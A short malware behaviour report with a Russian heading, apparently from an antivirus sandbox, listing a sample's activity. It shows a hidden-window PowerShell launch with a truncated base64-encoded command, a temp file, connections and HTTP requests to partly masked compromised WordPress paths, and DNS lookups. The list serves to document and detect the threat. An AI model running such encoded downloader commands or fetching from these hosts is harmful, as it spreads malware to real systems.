Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\799739.cvr
- 'pi####.ulm.ac.id':80
- 'pi####.ulm.ac.id':443
- '16#.#27.220.53':80
- http://pi####.ulm.ac.id/wp-content/r4iio/
- http://16#.#27.220.53/wp-includes/YEQ4r/
- 'pi####.ulm.ac.id':443
- DNS ASK hg###ghting.com
- DNS ASK th###oilap.vn
- DNS ASK pi####.ulm.ac.id
- DNS ASK je#####pulautidung.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB... (со скрытым окном)